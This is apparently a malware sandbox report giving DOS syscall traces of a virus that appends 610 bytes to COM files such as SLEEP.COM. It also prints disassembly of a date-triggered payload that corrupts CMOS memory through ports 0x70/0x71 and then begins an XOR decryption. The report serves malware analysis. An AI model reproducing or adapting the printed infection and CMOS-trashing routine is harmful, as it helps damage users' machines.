2018-12-25T12:43:32.824436284Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-25T12:43:32.827315208Z 62 PC: 13f1e | Close file
2018-12-25T12:43:32.836147302Z 79 PC: 13f90 | Find next file
2018-12-25T12:43:32.839017482Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.840057682Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:32.846478985Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:32.85340345Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:32.859423208Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:32.860520884Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:32.863345303Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:32.864980992Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:32.865979974Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:32.871053042Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:32.878707893Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:32.880654113Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:32.8888493Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:32.891342078Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.892394306Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:32.902631362Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:32.908930454Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:32.914907669Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:32.91646487Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:32.919081246Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:32.921486254Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:32.923160679Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:32.924424794Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:32.932228414Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:32.935030832Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:32.942780211Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:32.945066663Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.946571824Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:32.95597737Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:32.963171481Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:32.970079571Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:32.971419301Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:32.973881996Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:32.976344494Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:32.977832903Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:32.978958377Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:32.986686943Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:32.988626206Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:32.996237194Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:32.99874303Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.999778188Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.009141952Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.015803603Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.022298682Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.023469642Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.026105513Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.029789381Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.031372411Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.03291632Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.041722192Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.044048134Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.051921318Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.055475572Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.057391934Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.067338666Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.075493097Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.081652827Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.082861992Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.0861467Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.089521622Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.091154483Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.094123182Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.101307254Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.103328598Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.11330008Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.115867254Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.117109829Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.128096652Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.135125489Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.141421231Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.143707024Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.146313941Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.149170292Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.15136396Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.153391355Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.161573531Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.164245262Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.173307408Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.176200411Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.177883052Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.188295993Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.194754644Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T12:43:33.197487809Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.200058761Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.202410063Z 25 PC: 13f9b | Get default drive
2018-12-25T12:43:33.203721125Z 14 PC: 13fc7 | Set default drive (Drive = 'C')
2018-12-25T12:43:33.205661131Z 59 PC: 13fce | Change current directory
2018-12-25T12:43:33.211306371Z 78 PC: 13fd5 | Find first file
2018-12-25T12:43:33.219999884Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.222265712Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.019502487Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.027017915Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.033871023Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.035549169Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.038439296Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.042101561Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.043402738Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.044678951Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.051724567Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.053748896Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.063765894Z 79 PC: 13fe1 | Find next file
2018-12-25T12:43:34.067783194Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.06955681Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.078778674Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.08617302Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.092795493Z 66 PC: 13ea7 | Move file pointer
2018-12-25T12:43:34.094599935Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.097810756Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.099341055Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.101922906Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.105280243Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.106774912Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.10807331Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.116115438Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.118743959Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.125697958Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.129794132Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.131289693Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.140533134Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.148024144Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.15400585Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.155589719Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.158722867Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.160960307Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.163411855Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.166768749Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.168106509Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.169328188Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.176672127Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.178805957Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.185604328Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.19233184Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.193624595Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.202795421Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.209639889Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.21544399Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.217071215Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.219743693Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.221917282Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.224574321Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.227516825Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.229752945Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.231971857Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.239423737Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.246229737Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.25323895Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.259247211Z 14 PC: 13ff0 | Set default drive (Drive = 'A')
2018-12-25T12:43:34.261162658Z 42 PC: 13ff4 | Get date 0x13ff4: cmp al, 4
0x13ff6: jne 0x1404a
0x13ff8: mov dx, 0x70
0x13ffb: mov ax, cx
0x13ffd: out dx, ax
0x13ffe: mov dx, 0x71
0x14001: in al, dx
0x14002: inc al
0x14004: out dx, al
0x14005: loop 0x13ff8
0x14007: push es
0x14008: push bp
0x14009: mov dx, word ptr [0xffb7]
0x1400d: add dx, 0x100
0x14011: add dx, 0x265
0x14015: sub dx, 0x2a
0x14018: mov bx, dx
0x1401a: mov cx, 0
0x1401d: mov al, byte ptr [bx]
0x1401f: xor al, 0x36

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15492,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:32.784723062Z 78 PC: 13f84 | Find first file
2018-12-25T12:43:32.790308505Z 47 PC: 13e48 | Get disk transfer address
2018-12-25T12:43:32.791674307Z 67 PC: 13e7e | Get or set file attributes
2018-12-25T12:43:33.167126919Z 61 PC: 13e83 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:33.180645534Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:43:33.188590535Z 66 PC: 13ebb | Move file pointer
2018-12-25T12:43:33.1899746Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T12:43:33.192671769Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:43:33.20539096Z 66 PC: 13ede | Move file pointer
2018-12-25T12:43:33.206892855Z 66 PC: 13eed | Move file pointer
2018-12-25T12:43:33.208382777Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-25T12:43:33.217740503Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-25T12:43:33.220471847Z 62 PC: 13f1e | Close file
2018-12-25T12:43:33.229826582Z 79 PC: 13f90 | Find next file
2018-12-25T12:43:33.233571834Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.235232204Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.246236632Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.255384002Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.263147157Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.26487452Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.268334473Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.271085619Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.272306842Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.273716536Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.279175864Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.280680816Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.286394189Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.288518665Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.28945049Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.295653377Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.303062948Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.310239985Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.311668931Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.315820131Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.318472772Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.319861876Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.321586889Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.330119312Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.332404049Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.341715861Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.344515389Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.345638756Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.356493811Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.373068299Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.380519677Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.382406414Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.385279924Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.388356604Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.390684071Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.39220574Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.401066655Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.403184789Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.412704159Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.415785661Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.417285775Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.428109712Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.435311487Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.442571636Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.444932214Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.447908205Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.451005991Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.453444207Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.455182332Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.463990682Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.467126848Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.476700254Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.479756243Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.482015514Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.492894489Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.500607825Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.508653615Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.511548495Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.514639644Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.517613969Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.520008675Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.522387628Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.532430637Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.536676274Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.545939522Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.548900668Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.551361098Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.56266985Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.570143934Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.578179858Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.579869192Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.583115391Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.587377141Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.589306675Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.59123919Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.603121802Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.605643549Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.614411318Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.61804053Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.619331283Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.629859229Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.637507444Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T12:43:33.644875877Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.64677893Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.650103274Z 25 PC: 13f9b | Get default drive
2018-12-25T12:43:33.651369349Z 14 PC: 13fc7 | Set default drive (Drive = 'C')
2018-12-25T12:43:33.652914984Z 59 PC: 13fce | Change current directory
2018-12-25T12:43:33.659292207Z 78 PC: 13fd5 | Find first file
2018-12-25T12:43:33.668772492Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.670428676Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.01451615Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.024118162Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.030696007Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.032417347Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.036691801Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.039888799Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.041579207Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.044445721Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.052826733Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.055435623Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.064542454Z 79 PC: 13fe1 | Find next file
2018-12-25T12:43:34.068499245Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.070357825Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.081518691Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.090135497Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.096356003Z 66 PC: 13ea7 | Move file pointer
2018-12-25T12:43:34.098090541Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.102118842Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.104125545Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.107626608Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.112127281Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.114207475Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.116263182Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.126959775Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.130268239Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.138857747Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.143741845Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.146122514Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.156850194Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.165048107Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.171124984Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.172707864Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.176662232Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.178192439Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.181225162Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.184690722Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.187000704Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.188577327Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.196841625Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.199488462Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.207711105Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.214944112Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.216192167Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.227764676Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.235363793Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.24180076Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.243098563Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.245596491Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.247025246Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.250704683Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.254112508Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.256839208Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.25867736Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.267242743Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.270772679Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.278684965Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.285421244Z 14 PC: 13ff0 | Set default drive (Drive = 'A')
2018-12-25T12:43:34.287883733Z 42 PC: 13ff4 | Get date 0x13ff4: cmp al, 4
0x13ff6: jne 0x1404a
0x13ff8: mov dx, 0x70
0x13ffb: mov ax, cx
0x13ffd: out dx, ax
0x13ffe: mov dx, 0x71
0x14001: in al, dx
0x14002: inc al
0x14004: out dx, al
0x14005: loop 0x13ff8
0x14007: push es
0x14008: push bp
0x14009: mov dx, word ptr [0xffb7]
0x1400d: add dx, 0x100
0x14011: add dx, 0x265
0x14015: sub dx, 0x2a
0x14018: mov bx, dx
0x1401a: mov cx, 0
0x1401d: mov al, byte ptr [bx]
0x1401f: xor al, 0x36
2018-12-25T12:43:34.290586667Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:43:34.296856507Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":3,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15492,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:33.080150489Z 78 PC: 13f84 | Find first file
2018-12-25T12:43:33.094546966Z 47 PC: 13e48 | Get disk transfer address
2018-12-25T12:43:33.09582847Z 67 PC: 13e7e | Get or set file attributes
2018-12-25T12:43:33.123189824Z 61 PC: 13e83 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:33.130656113Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:43:33.136774399Z 66 PC: 13ebb | Move file pointer
2018-12-25T12:43:33.138155016Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T12:43:33.142052123Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:43:33.144794348Z 66 PC: 13ede | Move file pointer
2018-12-25T12:43:33.146633103Z 66 PC: 13eed | Move file pointer
2018-12-25T12:43:33.148993931Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-25T12:43:33.158506939Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-25T12:43:33.161053776Z 62 PC: 13f1e | Close file
2018-12-25T12:43:33.16963498Z 79 PC: 13f90 | Find next file
2018-12-25T12:43:33.172552726Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.174063222Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.184481863Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.191217767Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.197770521Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.201439113Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.204459586Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.207337053Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.20931691Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.211268535Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.219377354Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.221712696Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.2302576Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.233166846Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.235179028Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.456575607Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.460955449Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.465101802Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.466219832Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.467880732Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.469526755Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.470821735Z 66 PC: 13eed | Move file pointer (See above)
